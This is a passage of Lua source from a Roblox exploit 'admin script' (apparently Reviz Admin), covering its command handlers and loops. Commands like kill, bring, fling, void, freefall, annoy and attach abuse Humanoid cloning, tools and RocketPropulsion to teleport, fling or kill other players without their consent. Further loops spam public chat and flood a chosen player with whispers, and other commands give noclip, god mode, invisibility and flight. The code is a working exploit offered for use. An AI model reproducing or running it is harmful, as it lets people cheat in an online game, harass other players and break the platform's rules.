  1967.         if pgscheck == true then
  1968.             game:GetService("StarterGui"):SetCore("SendNotification", {
  1969.             Title = "PGSPhysicsSolverEnabled";
  1970.             Text = "PGS is Enabled!";
  1971.             })
  1972.         else
  1973.             game:GetService("StarterGui"):SetCore("SendNotification", {
  1974.             Title = "PGSPhysicsSolverEnabled";
  1975.             Text = "PGS is Disabled!";
  1976.             })
  1977.         end
  1978.     end
  1979.     if string.sub(msg, 1, 12) == (prefix.."removeinvis") then
  1980.         for i,v in pairs(game:GetService("Workspace"):GetDescendants()) do
  1981.             if v:IsA("Part") then
  1982.                 if v.Transparency == 1 then
  1983.                     if v.Name ~= "HumanoidRootPart" then
  1984.                         v:Destroy()
  1985.                     end
  1986.                 end
  1987.             end
  1988.         end
  1989.     end
  1990.     if string.sub(msg, 1, 10) == (prefix.."removefog") then
  1991.         game:GetService("Lighting").FogStart = 0
  1992.         game:GetService("Lighting").FogEnd = 9999999999999
  1993.     end
  1994.     if string.sub(msg, 1, 8) == (prefix.."disable") then
  1995.         lplayer.Character.Humanoid.Parent = lplayer
  1996.     end
  1997.     if string.sub(msg, 1, 7) == (prefix.."enable") then
  1998.         lplayer.Humanoid.Parent = lplayer.Character
  1999.     end
  2000.     if string.sub(msg, 1, 8) == (prefix.."prefix ") then
  2001.         prefix = (string.sub(msg, 9, 9))
  2002.         wait(0.1)
  2003.         change()
  2004.         wait(0.1)
  2005.         game:GetService("StarterGui"):SetCore("SendNotification", {
  2006.         Title = "Prefix changed!";
  2007.         Text = "Prefix is now "..prefix..". Use ;resetprefix to reset to ;";
  2008.         })
  2009.     end
  2010.     if string.sub(msg, 1, 12) == (";resetprefix") then
  2011.         prefix = ";"
  2012.         wait(0.1)
  2013.         change()
  2014.         wait(0.1)
  2015.         game:GetService("StarterGui"):SetCore("SendNotification", {
  2016.         Title = "Prefix changed!";
  2017.         Text = "Prefix is now "..prefix..". Make sure it's one key!";
  2018.         })
  2019.     end
  2020.     if string.sub(msg, 1, 10) == (prefix.."flyspeed ") then
  2021.         speedfly = string.sub(msg, 11)
  2022.         wait()
  2023.         change()
  2024.     end
  2025.     if string.sub(msg, 1, 8) == (prefix.."carpet ") then
  2026.         for i,v in pairs(GetPlayer(string.sub(msg, 9))) do
  2027.             local Anim3 = Instance.new("Animation")
  2028.             Anim3.AnimationId = "rbxassetid://282574440"
  2029.             local track3 = lplayer.Character.Humanoid:LoadAnimation(Anim3)
  2030.             track3:Play(.1, 1, 1)
  2031.             bplrr = v.Name
  2032.             banpl = true
  2033.         end
  2034.     end
  2035.     if string.sub(msg, 1, 9) == (prefix.."uncarpet") then
  2036.         banpl = false
  2037.     end
  2038.     if string.sub(msg, 1, 7) == (prefix.."stare ") then
  2039.         for i,v in pairs(GetPlayer(string.sub(msg, 8))) do
  2040.             staring = true
  2041.             stareplr = v
  2042.         end
  2043.     end
  2044.     if string.sub(msg, 1, 8) == (prefix.."unstare") then
  2045.         staring = false
  2046.     end
  2047.     if string.sub(msg, 1, 8) == (prefix.."logchat") then
  2048.         chatlogs = true
  2049.         game:GetService("StarterGui"):SetCore("SendNotification", {
  2050.         Title = "LogChat enabled";
  2051.         Text = "Now logging all player chat.";
  2052.         })
  2053.     end
  2054.     if string.sub(msg, 1, 10) == (prefix.."unlogchat") then
  2055.         chatlogs = false
  2056.         game:GetService("StarterGui"):SetCore("SendNotification", {
  2057.         Title = "LogChat disabled";
  2058.         Text = "Stopped logging all player chat.";
  2059.         })
  2060.     end
  2061.     if string.sub(msg, 1, 7) == (prefix.."fixcam") then
  2062.         game:GetService("Workspace").CurrentCamera:Destroy()
  2063.         wait(0.1)
  2064.         game:GetService("Workspace").CurrentCamera.CameraSubject = lplayer.Character.Humanoid
  2065.         game:GetService("Workspace").CurrentCamera.CameraType = "Custom"
  2066.         lplayer.CameraMinZoomDistance = 0.5
  2067.         lplayer.CameraMaxZoomDistance = 400
  2068.         lplayer.CameraMode = "Classic"
  2069.     end
  2070.     if string.sub(msg, 1, 8) == (prefix.."unstate") then
  2071.         changingstate = false
  2072.     end
  2073. end)
  2074.  
  2075. local function tp()
  2076.     for i, player in ipairs(game:GetService("Players"):GetPlayers()) do
  2077.         if player.Character and player.Character:FindFirstChild("HumanoidRootPart") then
  2078.             if player.Name == brplr then
  2079.                 player.Character.HumanoidRootPart.CFrame = lplayer.Character.HumanoidRootPart.CFrame + lplayer.Character.HumanoidRootPart.CFrame.lookVector * 2
  2080.             end
  2081.         end
  2082.     end
  2083. end
  2084. local function tpall()
  2085.     for i, player in ipairs(game:GetService("Players"):GetPlayers()) do
  2086.         if player.Character and player.Character:FindFirstChild("HumanoidRootPart") then
  2087.             player.Character.HumanoidRootPart.CFrame = lplayer.Character.HumanoidRootPart.CFrame + lplayer.Character.HumanoidRootPart.CFrame.lookVector * 3
  2088.         end
  2089.     end
  2090. end
  2091. spawn(function()
  2092.     while wait(spamdelay) do
  2093.         if spamming == true then
  2094.             game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer(spamtext, "All")
  2095.         end
  2096.     end
  2097. end)
  2098. spawn(function()
  2099.     while wait(spamdelay) do
  2100.         if spammingpm == true then
  2101.             game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer("/w "..pmspammed.." @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@", "All")
  2102.         end
  2103.     end
  2104. end)
  2105. spawn(function()
  2106.     while wait() do
  2107.         if cbring == true then
  2108.             tp()
  2109.         end
  2110.     end
  2111. end)
  2112. spawn(function()
  2113.     while wait() do
  2114.         if cbringall == true then
  2115.             tpall()
  2116.         end
  2117.     end
  2118. end)
  2119.  
  2120. Mouse.KeyDown:connect(function(Key)
  2121.     if Key == prefix then
  2122.         CMDBAR:CaptureFocus()
  2123.     end
  2124. end)
  2125.  
  2126. CMDBAR.FocusLost:connect(function(enterPressed)
  2127.     if enterPressed then
  2128.         if string.sub(CMDBAR.Text, 1, 5) == ("kill ") then
  2129.             if string.sub(CMDBAR.Text, 6) == "me" then
  2130.                 lplayer.Character.HumanoidRootPart.CFrame = CFrame.new(100000,0,100000)
  2131.             else
  2132.                 for i,v in pairs(GetPlayer(string.sub(CMDBAR.Text, 6)))do
  2133.                     local NOW = lplayer.Character.HumanoidRootPart.CFrame
  2134.                     lplayer.Character.Humanoid.Name = 1
  2135.                     local l = lplayer.Character["1"]:Clone()
  2136.                     l.Parent = lplayer.Character
  2137.                     l.Name = "Humanoid"
  2138.                     wait(0.1)
  2139.                     lplayer.Character["1"]:Destroy()
  2140.                     game:GetService("Workspace").CurrentCamera.CameraSubject = lplayer.Character
  2141.                     lplayer.Character.Animate.Disabled = true
  2142.                     wait(0.1)
  2143.                     lplayer.Character.Animate.Disabled = false
  2144.                     lplayer.Character.Humanoid.DisplayDistanceType = "None"
  2145.                     for i,v in pairs(game:GetService'Players'.LocalPlayer.Backpack:GetChildren())do
  2146.                     lplayer.Character.Humanoid:EquipTool(v)
  2147.                     end
  2148.                     local function tp(player,player2)
  2149.                     local char1,char2=player.Character,player2.Character
  2150.                     if char1 and char2 then
  2151.                     char1:MoveTo(char2.Head.Position)
  2152.                     end
  2153.                     end
  2154.                     wait(0.1)
  2155.                     lplayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame
  2156.                     wait(0.2)
  2157.                     lplayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame
  2158.                     wait(0.5)
  2159.                     lplayer.Character.HumanoidRootPart.CFrame = CFrame.new(Vector3.new(-100000,10,-100000))
  2160.                     wait(0.7)
  2161.                     tp(lplayer,game:GetService("Players")[v.Name])
  2162.                     wait(0.7)
  2163.                     lplayer.Character.HumanoidRootPart.CFrame = NOW
  2164.                     game:GetService("StarterGui"):SetCore("SendNotification", {
  2165.                     Title = "Tools needed!";
  2166.                     Text = "You need a tool in your backpack for this command!";
  2167.                     })
  2168.                 end
  2169.             end
  2170.         end
  2171.         if string.sub(CMDBAR.Text, 1, 6) == ("bring ") then
  2172.             for i,v in pairs(GetPlayer(string.sub(CMDBAR.Text, 7)))do
  2173.                 local NOW = lplayer.Character.HumanoidRootPart.CFrame
  2174.                 lplayer.Character.Humanoid.Name = 1
  2175.                 local l = lplayer.Character["1"]:Clone()
  2176.                 l.Parent = lplayer.Character
  2177.                 l.Name = "Humanoid"
  2178.                 wait(0.1)
  2179.                 lplayer.Character["1"]:Destroy()
  2180.                 game:GetService("Workspace").CurrentCamera.CameraSubject = lplayer.Character
  2181.                 lplayer.Character.Animate.Disabled = true
  2182.                 wait(0.1)
  2183.                 lplayer.Character.Animate.Disabled = false
  2184.                 lplayer.Character.Humanoid.DisplayDistanceType = "None"
  2185.                 for i,v in pairs(game:GetService'Players'.LocalPlayer.Backpack:GetChildren())do
  2186.                 lplayer.Character.Humanoid:EquipTool(v)
  2187.                 end
  2188.                 local function tp(player,player2)
  2189.                 local char1,char2=player.Character,player2.Character
  2190.                 if char1 and char2 then
  2191.                 char1.HumanoidRootPart.CFrame = char2.HumanoidRootPart.CFrame
  2192.                 end
  2193.                 end
  2194.                 local function getout(player,player2)
  2195.                 local char1,char2=player.Character,player2.Character
  2196.                 if char1 and char2 then
  2197.                 char1:MoveTo(char2.Head.Position)
  2198.                 end
  2199.                 end
  2200.                 tp(game:GetService("Players")[v.Name], lplayer)
  2201.                 wait(0.2)
  2202.                 tp(game:GetService("Players")[v.Name], lplayer)
  2203.                 wait(0.5)
  2204.                 lplayer.Character.HumanoidRootPart.CFrame = NOW
  2205.                 wait(0.5)
  2206.                 getout(lplayer, game:GetService("Players")[v.Name])
  2207.                 wait(0.3)
  2208.                 lplayer.Character.HumanoidRootPart.CFrame = NOW
  2209.                 game:GetService("StarterGui"):SetCore("SendNotification", {
  2210.                 Title = "Tools needed!";
  2211.                 Text = "You need a tool in your backpack for this command!";
  2212.                 })
  2213.             end
  2214.         end
  2215.         if string.sub(CMDBAR.Text, 1, 5) == ("spin ") then
  2216.             for i,v in pairs(GetPlayer(string.sub(CMDBAR.Text, 6))) do
  2217.                 lplayer.Character.Humanoid.Name = 1
  2218.                 local l = lplayer.Character["1"]:Clone()
  2219.                 l.Parent = lplayer.Character
  2220.                 l.Name = "Humanoid"
  2221.                 wait(0.1)
  2222.                 lplayer.Character["1"]:Destroy()
  2223.                 game:GetService("Workspace").CurrentCamera.CameraSubject = lplayer.Character
  2224.                 lplayer.Character.Animate.Disabled = true
  2225.                 wait(0.1)
  2226.                 lplayer.Character.Animate.Disabled = false
  2227.                 lplayer.Character.Humanoid.DisplayDistanceType = "None"
  2228.                 for i,v in pairs(game:GetService'Players'.LocalPlayer.Backpack:GetChildren())do
  2229.                 lplayer.Character.Humanoid:EquipTool(v)
  2230.                 end
  2231.                 lplayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character["Left Arm"].CFrame
  2232.                 spinplr = v
  2233.                 wait(0.5)
  2234.                 spin = true
  2235.                 game:GetService("StarterGui"):SetCore("SendNotification", {
  2236.                 Title = "Tools needed!";
  2237.                 Text = "You need a tool in your backpack for this command!";
  2238.                 })
  2239.             end
  2240.         end
  2241.         if string.sub(CMDBAR.Text, 1, 6) == ("unspin") then
  2242.             spin = false
  2243.         end
  2244.         if string.sub(CMDBAR.Text, 1, 7) == ("attach ") then
  2245.             for i,v in pairs(GetPlayer(string.sub(CMDBAR.Text, 8))) do
  2246.                 lplayer.Character.Humanoid.Name = 1
  2247.                 local l = lplayer.Character["1"]:Clone()
  2248.                 l.Parent = lplayer.Character
  2249.                 l.Name = "Humanoid"
  2250.                 wait(0.1)
  2251.                 lplayer.Character["1"]:Destroy()
  2252.                 game:GetService("Workspace").CurrentCamera.CameraSubject = lplayer.Character
  2253.                 lplayer.Character.Animate.Disabled = true
  2254.                 wait(0.1)
  2255.                 lplayer.Character.Animate.Disabled = false
  2256.                 lplayer.Character.Humanoid.DisplayDistanceType = "None"
  2257.                 for i,v in pairs(game:GetService'Players'.LocalPlayer.Backpack:GetChildren())do
  2258.                 lplayer.Character.Humanoid:EquipTool(v)
  2259.                 end
  2260.                 lplayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character["Left Arm"].CFrame
  2261.                 wait(0.3)
  2262.                 lplayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character["Left Arm"].CFrame
  2263.                 attplr = v
  2264.                 game:GetService("StarterGui"):SetCore("SendNotification", {
  2265.                 Title = "Tools needed!";
  2266.                 Text = "You need a tool in your backpack for this command!";
  2267.                 })
  2268.             end
  2269.         end
  2270.         if string.sub(CMDBAR.Text, 1, 9) == ("unattach ") then
  2271.             for i,v in pairs(GetPlayer(string.sub(CMDBAR.Text, 10))) do
  2272.                 local function getout(player,player2)
  2273.                 local char1,char2=player.Character,player2.Character
  2274.                 if char1 and char2 then
  2275.                 char1:MoveTo(char2.Head.Position)
  2276.                 end
  2277.                 end
  2278.                 getout(lplayer, game:GetService("Players")[v.Name])
  2279.             end
  2280.         end
  2281.         if string.sub(CMDBAR.Text, 1, 7) == ("follow ") then
  2282.             for i,v in pairs(GetPlayer(string.sub(CMDBAR.Text, 8))) do
  2283.                 followed = true
  2284.                 flwplr = v
  2285.             end
  2286.         end
  2287.         if string.sub(CMDBAR.Text, 1, 8) == ("unfollow") then
  2288.             followed = false
  2289.         end
  2290.         if string.sub(CMDBAR.Text, 1, 9) == ("freefall ") then
  2291.             for i,v in pairs(GetPlayer(string.sub(CMDBAR.Text, 10))) do
  2292.                 local NOW = lplayer.Character.HumanoidRootPart.CFrame
  2293.                 lplayer.Character.Humanoid.Name = 1
  2294.                 local l = lplayer.Character["1"]:Clone()
  2295.                 l.Parent = lplayer.Character
  2296.                 l.Name = "Humanoid"
  2297.                 wait(0.1)
  2298.                 lplayer.Character["1"]:Destroy()
  2299.                 game:GetService("Workspace").CurrentCamera.CameraSubject = lplayer.Character
  2300.                 lplayer.Character.Animate.Disabled = true
  2301.                 wait(0.1)
  2302.                 lplayer.Character.Animate.Disabled = false
  2303.                 lplayer.Character.Humanoid.DisplayDistanceType = "None"
  2304.                 for i,v in pairs(game:GetService'Players'.LocalPlayer.Backpack:GetChildren())do
  2305.                 lplayer.Character.Humanoid:EquipTool(v)
  2306.                 end
  2307.                 lplayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame
  2308.                 wait(0.2)
  2309.                 lplayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame
  2310.                 wait(0.6)
  2311.                 lplayer.Character.HumanoidRootPart.CFrame = NOW
  2312.                 wait(0.6)
  2313.                 lplayer.Character.HumanoidRootPart.CFrame = CFrame.new(0,50000,0)
  2314.                 game:GetService("StarterGui"):SetCore("SendNotification", {
  2315.                 Title = "Tools needed!";
  2316.                 Text = "You need a tool in your backpack for this command!";
  2317.                 })
  2318.             end
  2319.         end
  2320.         if string.sub(CMDBAR.Text, 1, 6) == ("trail ") then
  2321.             for i,v in pairs(GetPlayer(string.sub(CMDBAR.Text, 7))) do
  2322.                 traill = true
  2323.                 trlplr = v
  2324.             end
  2325.         end
  2326.         if string.sub(CMDBAR.Text, 1, 7) == ("untrail") then
  2327.             traill = false
  2328.         end
  2329.         if string.sub(CMDBAR.Text, 1, 6) == ("orbit ") then
  2330.             if string.sub(CMDBAR.Text, 7) == "all" or string.sub(CMDBAR.Text, 7) == "others" or string.sub(CMDBAR.Text, 7) == "me" then
  2331.                 lplayer.Character.HumanoidRootPart.CFrame = lplayer.Character.HumanoidRootPart.CFrame
  2332.             else
  2333.                 for i,v in pairs(GetPlayer(string.sub(CMDBAR.Text, 7))) do
  2334.                     local o = Instance.new("RocketPropulsion")
  2335.                     o.Parent = lplayer.Character.HumanoidRootPart
  2336.                     o.Name = "Orbit"
  2337.                     o.Target = game:GetService("Players")[v.Name].Character.HumanoidRootPart
  2338.                     o:Fire()
  2339.                     noclip = true
  2340.                 end
  2341.             end
  2342.         end
  2343.         if string.sub(CMDBAR.Text, 1, 7) == ("unorbit") then
  2344.             lplayer.Character.HumanoidRootPart.Orbit:Destroy()
  2345.             noclip = false
  2346.         end
  2347.         if string.sub(CMDBAR.Text, 1, 6) == ("fling ") then
  2348.             if string.sub(CMDBAR.Text, 7) == "all" or string.sub(CMDBAR.Text, 7) == "others" or string.sub(CMDBAR.Text, 7) == "me" then
  2349.                 lplayer.Character.HumanoidRootPart.CFrame = lplayer.Character.HumanoidRootPart.CFrame
  2350.             else
  2351.                 for i,v in pairs(GetPlayer(string.sub(CMDBAR.Text, 7))) do
  2352.                     local y = Instance.new("RocketPropulsion")
  2353.                     y.Parent = lplayer.Character.HumanoidRootPart
  2354.                     y.CartoonFactor = 1
  2355.                     y.MaxThrust = 800000
  2356.                     y.MaxSpeed = 1000
  2357.                     y.ThrustP = 200000
  2358.                     y.Name = "Fling"
  2359.                     game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players")[v.Name].Character.Head
  2360.                     y.Target = game:GetService("Players")[v.Name].Character.HumanoidRootPart
  2361.                     y:Fire()
  2362.                     noclip = true
  2363.                 end
  2364.             end
  2365.         end
  2366.         if string.sub(CMDBAR.Text, 1, 7) == ("unfling") then
  2367.             noclip = false
  2368.             lplayer.Character.HumanoidRootPart.Fling:Destroy()
  2369.             game:GetService("Workspace").CurrentCamera.CameraSubject = lplayer.Character.Head
  2370.             wait(0.4)
  2371.             lplayer.Character.HumanoidRootPart.Fling:Destroy()
  2372.         end
  2373.         if string.sub(CMDBAR.Text, 1, 7) == ("fecheck") then
  2374.             if game:GetService("Workspace").FilteringEnabled == true then
  2375.                 warn("FE is Enabled (Filtering Enabled)")
  2376.                 game:GetService("StarterGui"):SetCore("SendNotification", {
  2377.                     Title = "FE is Enabled";
  2378.                     Text = "Filtering Enabled. Enjoy using Reviz Admin!";
  2379.                 })
  2380.             else
  2381.                 warn("FE is Disabled (Filtering Disabled) Consider using a different admin script.")
  2382.                 game:GetService("StarterGui"):SetCore("SendNotification", {
  2383.                     Title = "FE is Disabled";
  2384.                     Text = "Filtering Disabled. Consider using a different admin script.";
  2385.                 })
  2386.             end
  2387.         end
  2388.         if string.sub(CMDBAR.Text, 1, 5) == ("void ") then
  2389.             for i,v in pairs(GetPlayer(string.sub(CMDBAR.Text, 6))) do
  2390.                 lplayer.Character.Humanoid.Name = 1
  2391.                 local l = lplayer.Character["1"]:Clone()
  2392.                 l.Parent = lplayer.Character
  2393.                 l.Name = "Humanoid"
  2394.                 wait(0.1)
  2395.                 lplayer.Character["1"]:Destroy()
  2396.                 game:GetService("Workspace").CurrentCamera.CameraSubject = lplayer.Character
  2397.                 lplayer.Character.Animate.Disabled = true
  2398.                 wait(0.1)
  2399.                 lplayer.Character.Animate.Disabled = false
  2400.                 lplayer.Character.Humanoid.DisplayDistanceType = "None"
  2401.                 for i,v in pairs(game:GetService'Players'.LocalPlayer.Backpack:GetChildren())do
  2402.                 lplayer.Character.Humanoid:EquipTool(v)
  2403.                 end
  2404.                 lplayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame
  2405.                 wait(0.2)
  2406.                 lplayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame
  2407.                 wait(0.6)
  2408.                 lplayer.Character.HumanoidRootPart.CFrame = CFrame.new(999999999999999,0,999999999999999)
  2409.                 game:GetService("StarterGui"):SetCore("SendNotification", {
  2410.                 Title = "Tools needed!";
  2411.                 Text = "You need a tool in your backpack for this command!";
  2412.                 })
  2413.             end
  2414.         end
  2415.         if string.sub(CMDBAR.Text, 1, 6) == ("noclip") then
  2416.             noclip = true
  2417.             game:GetService("StarterGui"):SetCore("SendNotification", {
  2418.             Title = "Noclip enabled";
  2419.             Text = "Type ;clip to disable";
  2420.             })
  2421.         end
  2422.         if string.sub(CMDBAR.Text, 1, 4) == ("clip") then
  2423.             noclip = false
  2424.             game:GetService("StarterGui"):SetCore("SendNotification", {
  2425.             Title = "Noclip disabled";
  2426.             Text = "Type ;noclip to enable";
  2427.             })
  2428.         end
  2429.         if string.sub(CMDBAR.Text, 1, 6) == ("speed ") then
  2430.             lplayer.Character.Humanoid.WalkSpeed = (string.sub(CMDBAR.Text, 7))
  2431.         end
  2432.         if string.sub(CMDBAR.Text, 1, 3) == ("ws ") then
  2433.             lplayer.Character.Humanoid.WalkSpeed = (string.sub(CMDBAR.Text, 4))
  2434.         end
  2435.         if string.sub(CMDBAR.Text, 1, 10) == ("hipheight ") then
  2436.             lplayer.Character.Humanoid.HipHeight = (string.sub(CMDBAR.Text, 11))
  2437.         end
  2438.         if string.sub(CMDBAR.Text, 1, 3) == ("hh ") then
  2439.             lplayer.Character.Humanoid.HipHeight = (string.sub(CMDBAR.Text, 4))
  2440.         end
  2441.         if string.sub(CMDBAR.Text, 1, 10) == ("jumppower ") then
  2442.             lplayer.Character.Humanoid.JumpPower = (string.sub(CMDBAR.Text, 11))
  2443.         end
  2444.         if string.sub(CMDBAR.Text, 1, 3) == ("jp ") then
  2445.             lplayer.Character.Humanoid.JumpPower = (string.sub(CMDBAR.Text, 4))
  2446.         end
  2447.         if string.sub(CMDBAR.Text, 1, 7) == ("default") then
  2448.             lplayer.Character.Humanoid.JumpPower = 50
  2449.             lplayer.Character.Humanoid.WalkSpeed = 16
  2450.             lplayer.Character.Humanoid.HipHeight = 0
  2451.         end
  2452.         if string.sub(CMDBAR.Text, 1, 6) == ("annoy ") then
  2453.             for i,v in pairs(GetPlayer(string.sub(CMDBAR.Text, 7))) do
  2454.                 annoying = true
  2455.                 annplr = v
  2456.             end
  2457.         end
  2458.         if string.sub(CMDBAR.Text, 1, 7) == ("unannoy") then
  2459.             annoying = false
  2460.         end
  2461.         if string.sub(CMDBAR.Text, 1, 9) == ("headwalk ") then
  2462.             for i,v in pairs(GetPlayer(string.sub(CMDBAR.Text, 10))) do
  2463.                 hwalk = true
  2464.                 hdwplr = v
  2465.             end
  2466.         end
  2467.         if string.sub(CMDBAR.Text, 1, 10) == ("unheadwalk") then
  2468.             hwalk = false
  2469.         end
  2470.         if string.sub(CMDBAR.Text, 1, 7) == ("nolimbs") then
  2471.             lplayer.Character["Left Leg"]:Destroy()
  2472.             lplayer.Character["Left Arm"]:Destroy()
  2473.             lplayer.Character["Right Leg"]:Destroy()
  2474.             lplayer.Character["Right Arm"]:Destroy()
  2475.         end
  2476.         if string.sub(CMDBAR.Text, 1, 3) == ("god") then
  2477.             lplayer.Character.Humanoid.Name = 1
  2478.             local l = lplayer.Character["1"]:Clone()
  2479.             l.Parent = lplayer.Character
  2480.             l.Name = "Humanoid"
  2481.             wait(0.1)
  2482.             lplayer.Character["1"]:Destroy()
  2483.             game:GetService("Workspace").CurrentCamera.CameraSubject = lplayer.Character
  2484.             lplayer.Character.Animate.Disabled = true
  2485.             wait(0.1)
  2486.             lplayer.Character.Animate.Disabled = false
  2487.             lplayer.Character.Humanoid.DisplayDistanceType = "None"
  2488.             game:GetService("StarterGui"):SetCore("SendNotification", {
  2489.             Title = "FE Godmode enabled";
  2490.             Text = "Use ;grespawn or ;respawn to remove.";
  2491.             })
  2492.         end
  2493.         if string.sub(CMDBAR.Text, 1, 8) == ("drophats") then
  2494.             for i,v in pairs(lplayer.Character:GetChildren()) do
  2495.                 if (v:IsA("Accessory")) or (v:IsA("Hat")) then
  2496.                     v.Parent = workspace
  2497.                 end
  2498.             end
  2499.         end
  2500.         if string.sub(CMDBAR.Text, 1, 8) == ("droptool") then
  2501.             for i,v in pairs(lplayer.Character:GetChildren()) do
  2502.                 if (v:IsA("Tool")) then
  2503.                     v.Parent = workspace
  2504.                 end
  2505.             end
  2506.         end
  2507.         if string.sub(CMDBAR.Text, 1, 9) == ("loopdhats") then
  2508.             droppinghats = true
  2509.             game:GetService("StarterGui"):SetCore("SendNotification", {
  2510.             Title = "Loop Drop Enabled";
  2511.             Text = "Type ;unloopdhats to disable";
  2512.             })
  2513.         end
  2514.         if string.sub(CMDBAR.Text, 1, 11) == ("unloopdhats") then
  2515.             droppinghats = false
  2516.             game:GetService("StarterGui"):SetCore("SendNotification", {
  2517.             Title = "Loop Drop Disabled";
  2518.             Text = "Type ;loopdhats to enable.";
  2519.             })
  2520.         end
  2521.         if string.sub(CMDBAR.Text, 1, 9) == ("loopdtool") then
  2522.             droppingtools = true
  2523.             game:GetService("StarterGui"):SetCore("SendNotification", {
  2524.             Title = "Loop Drop Enabled";
  2525.             Text = "Type ;unloopdtool to disable";
  2526.             })
  2527.         end
  2528.         if string.sub(CMDBAR.Text, 1, 11) == ("unloopdtool") then
  2529.             droppingtools = false
  2530.             game:GetService("StarterGui"):SetCore("SendNotification", {
  2531.             Title = "Loop Drop Disabled";
  2532.             Text = "Type ;loopdtool to enable.";
  2533.             })
  2534.         end
  2535.         if string.sub(CMDBAR.Text, 1, 9) == ("invisible") then -- Credit to Timeless
  2536.             Local = game:GetService('Players').LocalPlayer
  2537.             Char  = Local.Character
  2538.             touched,tpdback = false, false
  2539.             box = Instance.new('Part',workspace)
  2540.             box.Anchored = true
  2541.             box.CanCollide = true
  2542.             box.Size = Vector3.new(10,1,10)
  2543.             box.Position = Vector3.new(0,10000,0)
  2544.             box.Touched:connect(function(part)
  2545.                 if (part.Parent.Name == Local.Name) then
  2546.                     if touched == false then
  2547.                         touched = true
  2548.                         function apply()
  2549.                             if script.Disabled ~= true then
  2550.                                 no = Char.HumanoidRootPart:Clone()
  2551.                                 wait(.25)
  2552.                                 Char.HumanoidRootPart:Destroy()
  2553.                                 no.Parent = Char
  2554.                                 Char:MoveTo(loc)
  2555.                                 touched = false
  2556.                             end end
  2557.                         if Char then
  2558.                             apply()
  2559.                         end
  2560.                     end
  2561.                 end
  2562.             end)
  2563.             repeat wait() until Char
  2564.             loc = Char.HumanoidRootPart.Position
  2565.             Char:MoveTo(box.Position + Vector3.new(0,.5,0))
  2566.             game:GetService("StarterGui"):SetCore("SendNotification", {
  2567.             Title = "Invisibility enabled!";
  2568.             Text = "Reset or use ;respawn to remove.";
  2569.             })
  2570.         end
  2571.         if string.sub(CMDBAR.Text, 1, 5) == ("view ") then
  2572.             for i,v in pairs(GetPlayer(string.sub(CMDBAR.Text, 6))) do
  2573.                 if game:GetService("Players")[v.Name].Character.Humanoid then
  2574.                     game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players")[v.Name].Character.Humanoid
  2575.                 else
  2576.                     game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players")[v.Name].Character.Head
  2577.                 end
  2578.             end
  2579.         end
  2580.         if string.sub(CMDBAR.Text, 1, 6) == ("unview") then
  2581.             if lplayer.Character.Humanoid then
  2582.                 game:GetService("Workspace").CurrentCamera.CameraSubject = lplayer.Character.Humanoid
  2583.             else
  2584.                 game:GetService("Workspace").CurrentCamera.CameraSubject = lplayer.Character.Head
  2585.             end
  2586.         end
  2587.         if string.sub(CMDBAR.Text, 1, 5) == ("goto ") then
  2588.             for i,v in pairs(GetPlayer(string.sub(CMDBAR.Text, 6))) do
  2589.                 lplayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame
  2590.             end
  2591.         end
  2592.         if string.sub(CMDBAR.Text, 1, 3) == ("fly") then
  2593.         repeat wait() until lplayer and lplayer.Character and lplayer.Character:FindFirstChild('HumanoidRootPart') and lplayer.Character:FindFirstChild('Humanoid')
  2594.         repeat wait() until Mouse
  2595.        
  2596.         local T = lplayer.Character.HumanoidRootPart
  2597.         local CONTROL = {F = 0, B = 0, L = 0, R = 0}
  2598.         local lCONTROL = {F = 0, B = 0, L = 0, R = 0}
  2599.         local SPEED = speedget
  2600.        
  2601.         local function fly()
  2602.             flying = true
  2603.             local BG = Instance.new('BodyGyro', T)
  2604.             local BV = Instance.new('BodyVelocity', T)
  2605.             BG.P = 9e4
  2606.             BG.maxTorque = Vector3.new(9e9, 9e9, 9e9)
  2607.             BG.cframe = T.CFrame
  2608.             BV.velocity = Vector3.new(0, 0.1, 0)
  2609.             BV.maxForce = Vector3.new(9e9, 9e9, 9e9)
  2610.             spawn(function()
  2611.             repeat wait()
  2612.             lplayer.Character.Humanoid.PlatformStand = true
  2613.             if CONTROL.L + CONTROL.R ~= 0 or CONTROL.F + CONTROL.B ~= 0 then
  2614.             SPEED = 50
  2615.             elseif not (CONTROL.L + CONTROL.R ~= 0 or CONTROL.F + CONTROL.B ~= 0) and SPEED ~= 0 then
  2616.             SPEED = 0
  2617.             end
  2618.             if (CONTROL.L + CONTROL.R) ~= 0 or (CONTROL.F + CONTROL.B) ~= 0 then
  2619.             BV.velocity = ((workspace.CurrentCamera.CoordinateFrame.lookVector * (CONTROL.F + CONTROL.B)) + ((workspace.CurrentCamera.CoordinateFrame * CFrame.new(CONTROL.L + CONTROL.R, (CONTROL.F + CONTROL.B) * 0.2, 0).p) - workspace.CurrentCamera.CoordinateFrame.p)) * SPEED
  2620.             lCONTROL = {F = CONTROL.F, B = CONTROL.B, L = CONTROL.L, R = CONTROL.R}
  2621.             elseif (CONTROL.L + CONTROL.R) == 0 and (CONTROL.F + CONTROL.B) == 0 and SPEED ~= 0 then
